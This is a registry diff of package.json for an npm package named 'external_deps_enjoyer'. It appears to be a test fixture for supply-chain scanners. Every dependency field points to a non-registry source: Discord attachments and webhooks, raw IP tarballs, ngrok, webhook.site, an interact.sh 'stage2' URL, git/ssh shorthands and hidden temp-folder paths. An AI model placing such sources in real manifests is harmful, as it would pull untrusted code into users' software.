external_deps_enjoyer 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +70 -0
package/package.json
ADDED
|
@@ -0,0 +1,70 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "external_deps_enjoyer",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "got any external deps for me?",
|
|
5
|
+
"dependencies": {
|
|
6
|
+
"tarball-https": "https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/runtime.tgz",
|
|
7
|
+
"tarball-http": "http://203.0.113.77:8443/drop/pkg.tgz",
|
|
8
|
+
"tarball-HTTP": "HTTP://198.51.100.44/hidden/pkg.tgz",
|
|
9
|
+
"git-plus-ssh": "git+ssh://git@github.com/tmp-drop-8821/node-helper.git#v1.0.0",
|
|
10
|
+
"git-plus-https": "git+https://gitlab.com/anon-x7k2/sys-update.git",
|
|
11
|
+
"git-plus-http": "git+http://203.0.113.88:8080/mirror/pkg.git",
|
|
12
|
+
"git-plus-file": "git+file:///tmp/.cache/repo.git",
|
|
13
|
+
"git-proto": "git://203.0.113.91/hidden/repo.git",
|
|
14
|
+
"ssh-proto": "ssh://git@bitbucket.org/throwaway-drop/payload.git",
|
|
15
|
+
"scp-like": "git@github.com:tmp-drop-8821/node-helper.git",
|
|
16
|
+
"github-shorthand": "github:tmp-drop-8821/node-helper#v1.0.0",
|
|
17
|
+
"gitlab-shorthand": "gitlab:anon-x7k2/sys-update",
|
|
18
|
+
"bitbucket-shorthand": "bitbucket:throwaway-drop/payload",
|
|
19
|
+
"gist-shorthand": "gist:c0ffee00deadbeef",
|
|
20
|
+
"GITHUB-shorthand": "GITHUB:tmp-drop-8821/node-helper",
|
|
21
|
+
"bare-shorthand": "tmp-drop-8821/node-helper",
|
|
22
|
+
"bare-shorthand-ref": "tmp-drop-8821/node-helper#semver:^1.0.0",
|
|
23
|
+
"file-rel": "file:../.npm-cache",
|
|
24
|
+
"file-abs": "file:/tmp/.node_modules",
|
|
25
|
+
"yarn-link": "link:../.hidden",
|
|
26
|
+
"pnpm-portal": "portal:../.drop",
|
|
27
|
+
"dot": "./.payload",
|
|
28
|
+
"dotdot": "../.npm-cache",
|
|
29
|
+
"win-dot": ".\\AppData\\Local\\Temp\\drop",
|
|
30
|
+
"win-dotdot": "..\\AppData\\Roaming\\npm\\update",
|
|
31
|
+
"root": "/tmp/.node_modules",
|
|
32
|
+
"win-root": "\\Windows\\Temp\\.npm",
|
|
33
|
+
"home": "~/.config/update",
|
|
34
|
+
"win-home": "~\\AppData\\Local\\Temp\\drop"
|
|
35
|
+
},
|
|
36
|
+
"devDependencies": {
|
|
37
|
+
"dev-tarball": "https://discord.com/api/webhooks/111111111111111111/fake-token-not-a-real-webhook/pkg.tgz",
|
|
38
|
+
"dev-git": "git+ssh://git@github.com/tmp-drop-8821/dev-helper.git",
|
|
39
|
+
"dev-shorthand": "github:tmp-drop-8821/dev-helper",
|
|
40
|
+
"dev-local": "file:./.dev-drop"
|
|
41
|
+
},
|
|
42
|
+
"optionalDependencies": {
|
|
43
|
+
"opt-tarball": "https://rentry.co/faketestpoc/raw",
|
|
44
|
+
"opt-git": "git://203.0.113.91/hidden/opt.git",
|
|
45
|
+
"opt-shorthand": "github:tmp-drop-8821/opt-helper#deadbeef",
|
|
46
|
+
"opt-local": "file:/tmp/.optional-drop"
|
|
47
|
+
},
|
|
48
|
+
"peerDependencies": {
|
|
49
|
+
"peer-tarball": "https://webhook.site/00000000-0000-4000-8000-000000000000/pkg.tgz",
|
|
50
|
+
"peer-git": "git@gitlab.com:anon-x7k2/peer-update.git",
|
|
51
|
+
"peer-shorthand": "gitlab:anon-x7k2/peer-update",
|
|
52
|
+
"peer-local": "../.peer-drop"
|
|
53
|
+
},
|
|
54
|
+
"overrides": {
|
|
55
|
+
"ovr-tarball": "https://abc123xyz.ngrok-free.app/pkg.tgz",
|
|
56
|
+
"ovr-git": "ssh://git@bitbucket.org/throwaway-drop/ovr.git",
|
|
57
|
+
"ovr-shorthand": "bitbucket:throwaway-drop/ovr",
|
|
58
|
+
"ovr-local": "link:../.ovr-drop",
|
|
59
|
+
"parent": {
|
|
60
|
+
"nested-tarball": "http://interact.sh/stage2/nested.tgz",
|
|
61
|
+
"nested-git": "git+https://github.com/tmp-drop-8821/nested-helper.git",
|
|
62
|
+
"nested-shorthand": "github:tmp-drop-8821/nested-helper#v2",
|
|
63
|
+
"nested-bare": "anon-x7k2/nested-pkg",
|
|
64
|
+
"nested-local": "portal:../.nested-drop",
|
|
65
|
+
"deeper": {
|
|
66
|
+
"deep-gist": "gist:badc0deefacefeed"
|
|
67
|
+
}
|
|
68
|
+
}
|
|
69
|
+
}
|
|
70
|
+
}
|